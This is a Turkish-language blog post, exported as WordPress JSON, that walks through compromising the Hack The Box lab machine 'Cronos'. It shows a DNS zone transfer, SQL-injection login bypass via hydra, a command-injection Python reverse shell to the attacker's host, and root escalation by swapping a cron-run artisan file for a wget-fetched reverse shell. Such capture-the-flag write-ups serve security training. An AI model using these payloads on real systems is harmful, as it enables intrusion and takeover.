{"id":1530,"date":"2021-08-29T11:35:01","date_gmt":"2021-08-29T11:35:01","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1530"},"modified":"2021-08-29T11:35:01","modified_gmt":"2021-08-29T11:35:01","slug":"cronos","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/29\/cronos\/","title":{"rendered":"Cronos"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/Cronos\" title=\"Cronos\">Cronos<\/a> - HTB<\/td>\n<td>Orta<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/f77c75f363afe0d0a6eeccf6a8d8c252.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)\n|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)\n|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)\n53\/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)\n| dns-nsid: \n|_  bind.version: 9.10.3-P4-Ubuntu\n80\/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n<\/code><\/pre>\n<p>\u0130lk oalrak 80'e gittim ve hi\u00e7bir \u015fey bulamad\u0131m. Bunun \u00fczerine 53. port'tan ilgi toplamay\u0131 denedim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/cronos]\n\u2514\u2500# nslookup                                                                                                                                                                                          1 \u2a2f\n> server 10.10.10.13\nDefault server: 10.10.10.13\nAddress: 10.10.10.13#53\n> 10.10.10.13\n13.10.10.10.in-addr.arpa    name = ns1.cronos.htb.\n> \n<\/code><\/pre>\n<p>Daha sonras\u0131nda b\u00fct\u00fcn host'lqr\u0131 bulmay\u0131 denedim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/cronos]\n\u2514\u2500# host -l -a cronos.htb 10.10.10.13                     \nTrying &quot;cronos.htb&quot;\nUsing domain server:\nName: 10.10.10.13\nAddress: 10.10.10.13#53\nAliases: \n\n;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 26260\n;; flags: qr aa ra; QUERY: 1, ANSWER: 7, AUTHORITY: 0, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;cronos.htb.            IN  AXFR\n\n;; ANSWER SECTION:\ncronos.htb.     604800  IN  SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800\ncronos.htb.     604800  IN  NS  ns1.cronos.htb.\ncronos.htb.     604800  IN  A   10.10.10.13\nadmin.cronos.htb.   604800  IN  A   10.10.10.13\nns1.cronos.htb.     604800  IN  A   10.10.10.13\nwww.cronos.htb.     604800  IN  A   10.10.10.13\ncronos.htb.     604800  IN  SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800\n\nReceived 192 bytes from 10.10.10.13#53 in 83 ms\n<\/code><\/pre>\n<p>Bu hostlar\u0131 etc\/hosts'uma ekledim ve devam ettim. <\/p>\n<p>gobuster, dirb gibi taramalardan \u00e7ok \u00f6nemli bir \u015fey \u00e7\u0131kmad\u0131 ancak admin.cronos.htb sayfas\u0131nda sqli olabilece\u011fini d\u00fc\u015f\u00fcnd\u00fcm Bunun \u00fczerine internetten sqli wordlisti buldum ve onu bir wordlist olarak hydra'ya verdim. Wordlist'in oldu\u011fu sayfa: <a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/login-bypass\/sql-login-bypass\">https:\/\/book.hacktricks.xyz\/pentesting-web\/login-bypass\/sql-login-bypass<\/a><\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/cronos]\n\u2514\u2500# hydra -L sql.txt -P sql.txt admin.cronos.htb http-post-form &quot;\/:username=^USER^&amp;password=^PASS^:Your Login Name or Password is invalid&quot;\nHydra v9.1 (c) 2020 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2021-08-28 04:53:30\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 649636 login tries (l:806\/p:806), ~40603 tries per task\n[DATA] attacking http-post-form:\/\/admin.cronos.htb:80\/:username=^USER^&amp;password=^PASS^:Your Login Name or Password is invalid\n[STATUS] 1588.00 tries\/min, 1588 tries in 00:01h, 648048 to do in 06:49h, 16 active\n[STATUS] 1611.33 tries\/min, 4834 tries in 00:03h, 644802 to do in 06:41h, 16 active\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: admin\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: 1234\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: 123456\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: toor\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: password\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: root\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: test\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: guest\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039; or &#039;&#039;=&#039;\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039; or &#039;1&#039;=&#039;1\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039; or 1]%00\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039; or true() or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039; or \/* or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039; or &quot;a&quot; or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039; or 1 or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: &#039; or 1 or &#039;   password: &#039;or string-length(name(.))&lt;10 or&#039;\n[STATUS] 1729.00 tries\/min, 12103 tries in 00:07h, 637533 to do in 06:09h, 16 active\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: admin\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: 123456\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: password\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: root\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: 1234\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: test\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039; or &#039;1&#039;=&#039;1\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: toor\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039; or &#039;&#039;=&#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039; or 1]%00\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: guest\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039; or \/* or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039; or 1 or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039; or true() or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039; or &quot;a&quot; or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;   password: &#039;or string-length(name(.))&lt;10 or&#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: admin\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: password\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: 123456\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: root\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: 1234\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: toor\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: test\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: guest\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039; or &#039;1&#039;=&#039;1\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039; or \/* or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039; or &#039;&#039;=&#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039; or 1]%00\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039; or &quot;a&quot; or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039; or 1 or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039; or true() or &#039;\n[80][http-post-form] host: admin.cronos.htb   login: admin&#039; or &#039;1&#039;=&#039;2   password: &#039;or string-length(name(.))&lt;10 or&#039;\n^CThe session file .\/hydra.restore was written. Type &quot;hydra -R&quot; to resume session.\n<\/code><\/pre>\n<p>Harika \u015fimdi sisteme giri\u015f yapal\u0131m. Sisteme gir\u015fi yapt\u0131ktan sonra komut \u00e7al\u0131\u015ft\u0131rabildi\u011fimiz bir sayfa () g\u00f6rd\u00fcm.<\/p>\n<pre><code>8.8.8.8; python -c &#039;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.14.4&quot;,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;\/bin\/sh&quot;,&quot;-i&quot;]);&#039;<\/code><\/pre>\n<p>payload\u0131n\u0131 g\u00f6nderdim ve reverse ald\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/cronos]\n\u2514\u2500# nc -lvp 1234       \nlistening on [any] 1234 ...\nconnect to [10.10.14.4] from cronos.htb [10.10.10.13] 40338\n\/bin\/sh: 0: can&#039;t access tty; job control turned off\n$ id\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n$ \n<\/code><\/pre>\n<p>User flag'i direkt okuyabildim.<\/p>\n<pre><code class=\"language-sh\">python -c &#039;import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;\nwww-data@cronos:\/var\/www\/admin$ \n\nwww-data@cronos:\/var\/www\/admin$ \n\nwww-data@cronos:\/var\/www\/admin$ id\nid\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\nwww-data@cronos:\/var\/www\/admin$ \n\nwww-data@cronos:\/var\/www\/admin$ \n\nwww-data@cronos:\/var\/www\/admin$ cd \/home\ncd \/home\nwww-data@cronos:\/home$ ls\nls\nnoulis\nwww-data@cronos:\/home$ cd noulis\ncd noulis\nwww-data@cronos:\/home\/noulis$ ls\nls\nuser.txt\nwww-data@cronos:\/home\/noulis$ cat user.txt\ncat user.txt\n51d236438b333970dbba7dc3089be33b\n<\/code><\/pre>\n<p>\u0130\u00e7eride gezinirken artisan dosyas\u0131n\u0131n root haklarda s\u00fcrekli \u00e7al\u0131\u015ft\u0131r\u0131dl\u0131\u011f\u0131n\u0131 g\u00f6rd\u00fcm ve yazma hakk\u0131mda vard\u0131. Bunun \u00fczerine bir reverse ayarlad\u0131m ve makineye upload ettim daha sonras\u0131nda bir dinleme kabu\u011fu ba\u015flatt\u0131m ve root oldum.<\/p>\n<pre><code>* * * * *     root   php \/var\/www\/laravel\/artisan schedule:run &gt;&gt; \/dev\/null 2&gt;&amp;1<\/code><\/pre>\n<pre><code class=\"language-sh\">\nwww-data@cronos:\/var\/www\/laravel$ wget http:\/\/10.10.14.4\/artisan\nwget http:\/\/10.10.14.4\/artisan\n--2021-08-29 12:52:12--  http:\/\/10.10.14.4\/artisan\nConnecting to 10.10.14.4:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 5492 (5.4K) [application\/octet-stream]\nSaving to: &#039;artisan.1&#039;\n\nartisan.1           100%[===================&gt;]   5.36K  --.-KB\/s    in 0s      \n\n2021-08-29 12:52:12 (471 MB\/s) - &#039;artisan.1&#039; saved [5492\/5492]\n\nwww-data@cronos:\/var\/www\/laravel$ rm artisan\nrm artisan\nwww-data@cronos:\/var\/www\/laravel$ mv artisan.1 artisan\nmv artisan.1 artisan\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt\/PEASS-ng\/linPEAS]\n\u2514\u2500# nc -vlp 4444                                                                                       130 \u2a2f\nlistening on [any] 4444 ...\nconnect to [10.10.14.4] from cronos.htb [10.10.10.13] 55342\nLinux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU\/Linux\n 12:53:01 up 51 min,  0 users,  load average: 0.00, 0.00, 0.00\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=0(root) gid=0(root) groups=0(root)\n\/bin\/sh: 0: can&#039;t access tty; job control turned off\n# id\nuid=0(root) gid=0(root) groups=0(root)\n# cd \/root\n# ls\nroot.txt\n# cat root.txt\n1703b8a3c9a8dde879942c79d02fd3a0\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Cronos &#8211; HTB Orta Linux Walkthrough nmap taramas\u0131 ile ba\u015flayal\u0131m. PORT STATE SERVICE VERSION 22\/tcp open ssh OpenSSH 7.2p2 Ubuntu&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/29\/cronos\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Cronos<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[613],"class_list":["post-1530","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-dns-zone-transfer","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1530","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1530"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1530\/revisions"}],"predecessor-version":[{"id":1531,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1530\/revisions\/1531"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1530"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1530"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1530"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}